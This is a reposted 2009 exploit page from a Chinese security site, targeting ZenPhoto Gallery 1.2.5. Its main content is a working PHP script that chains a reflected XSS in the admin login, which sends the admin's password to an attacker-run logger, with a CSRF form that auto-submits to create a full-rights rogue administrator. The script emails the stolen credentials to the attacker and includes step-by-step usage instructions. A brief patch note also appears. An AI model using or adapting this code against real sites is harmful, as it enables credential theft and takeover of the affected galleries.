首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)
来源:petros [at] dusecurity.com 作者:petros 发布时间:2009-07-17  

<?php
####################################################################
#     Zen Photo Adminstrator Password Steal/Reset Exploit          #
#+================================================================+#
#     Discovered and coded by petros [at] dusecurity.com           #
#+----------------------------------------------------------------+#
#     Affects: ZenPhoto Gallery 1.2.5                     #
#+----------------------------------------------------------------+#
# Zenphoto is an answer to lots of calls for an online             #
# gallery solution that just makes sense. After years of           #
# bloated software that does everything and your dishes,           #
# zenphoto just shows your photos, simply. It’s got all the        # 
# functionality and “features” you need, and nothing you don’t.    #
# Where the old guys put in a bunch of modules and junk, we put    #
# a lot of thought. We hope you agree with our philosopy:          #
# simpler is better. Don’t get us wrong though –zenphoto really    #
# does have everything you need for your online gallery.           #
#+================================================================+#
# Exploit Explaination               #
#+================================================================+#
#                                                                  #
# This exploit actually advantage of two vulnerabilities.          #
# The first exploit is a simple XSS in the admin login page        #
# that will allow us to log the admins password. Unfortunatly,     #
# it only executes if the admin is NOT already logged in.          #
# The second is a CRSF exploit that allows you to change the       #
# admins password by automatically submitting a form.              #
# This exploit only works if the admin already logged in.          #
# Combine these and we have two ways to gain admin access          #
#                                                                  #
#+--------------------------------------------------------------=-+#
# How to patch/prevent these vulnernabilities                      #
#+--------------------------------------------------------------=-+#
#                                                                  #
# The XSS in the zp-core/admin.php page can be patched by          #
# santizing the $_GET['from'] variable before outputting it        #
#                                                                  #
# The CRSF requires either some form of referal checking or        #
# hidden security token on all forms (the latter would be better   #
#                                                                  #
#+----------------------------------------------------------------+#
# How to use this exploit to take over a ZenPhoto website          #
#+----------------------------------------------------------------+#
#                                                                  #
# To use the XSS logger make the admin click this link:            #
#                                                                  #
#+--[code snippet - put this all in one line]--+                   #
# http://victimsite.com/zp-core/admin.php?from="><script>          #
# document.forms[0].action="[logged url]";                         #
# </script><div id="lolpwnt                                        #
#+--[ end of code snippet]--+                                      #
#                                                                  #
# Replace [logger url] with the link to this PHP script            #
# Make sure your log.txt is writable before doing this             #
# On login the admins password will be saved to the file.          #
#                                                                  #
# The next exploit is used by simply giving the link to            #
# this script to the admin. if he clicks it his password           #
# will be changed automatically to "ownedbydusec"                  #
#                                                                  #
# That's about it :) Enjoy!                                        #
####################################################################
#            petros [at] dusecurity [dot] com                      #
####################################################################


//* Configure the exploit *//
$site = "http://victim.org/zen-photo";  // URL to vulnerable ZP install (no trailing slash!!)
$log = "log.txt";   // File to save logs to
$user = "admin";   // Name of the new admin
$pass = "ownedbydusec";   // New admin pass
$email = "you@site.com";  // Email to send log notifications to
// Do not edit below this line...

if($_POST)// We got logins from the XSS phisher
{
 $file = fopen($log, 'a');
 if(!$file) redirect();
 fwrite($file,"--==[{$_SERVER['REMOTE_ADDR']}]==--\r\n");
 foreach($_POST as $key => $value)
  fwrite($file, "$key = $value\r\n");
 fwrite($file,"\r\n");
 fclose($file);
 @mail($email, "ZenPhoto Double Penetration Exploit got a password!", "Please check your log file :)");
 redirect(); //send the back to the admin page
 
}
else // try to create a new admin using CRSF
{
 $inputs = array(
"saveadminoptions" => "true",

"totaladmins" => "1",

"alter_enabled" => "1",

"0-adminuser" => $user,

"0-confirmed" => "2",

"0-adminpass" => $pass,

"0-adminpass_2" => $pass,

"0-admin_rights" => "1",

"0-options_rights" => "1",

"0-zenpage_rights" => "1",

"0-tags_rights" => "1",

"0-themes_rights" => "1",

"0-all_album_rights" => "1",

"0-edit_rights" => "1",

"0-comment_rights" => "1",

"0-upload_rights" => "1",

"0-view_rights" => "1",

"0-main_rights" => "1",

"0-admin_name" => "Owned by dusecurity.com",

"0-admin_email" => 'petros was here &lt;3'
);
 $action = $site."/zp-core/admin-options.php?action=saveoptions";
 echo "<html><head><script>function badboy(){ document.forms[0].submit();{</script></head>";
 echo "<body onload=\"badboy();\"><form action=\"$action\" method=\"POST\">";
 foreach($inputs as $key => $value)
 {
  echo "<input name=\"$key\" value=\"$value\" type=\"hidden\" />";
 }
 echo '<input type="submit" value="Click Me!" />'; //not that they have a choice lol
 echo "</form></body></html>";
 // notify them by e-mail because the admin will probably notice he cant login
 @mail($email,"ZenPhoto Double Penetration Exploit Success!", "Site: $site/zp-core/admin.php\nUsername: $user\nPassword: $pass");
}


function redirect(){ header("Location: $site/zp-core/admin.php");exit; }

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·webLeague 2.2.0 (Auth Bypass)
·Zortam MP3 Player 1.50 (m3u) I
·Microsoft Office Web Component
·Zortam MP3 Media Studio 9.40 M
·Hamster Audio Player 0.3a Univ
·MultiMedia Jukebox 4.0 Build 0
·Admin News Tools Remote Conten
·Easy RM to MP3 Converter 2.7.3
·Multiple Web Browsers Denial o
·MixSense 1.0.0.1 DJ Studio (.m
·Infinity <= 2.0.5 Arbitrary Cr
·Mozilla Firefox 3.5 (Font tags
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved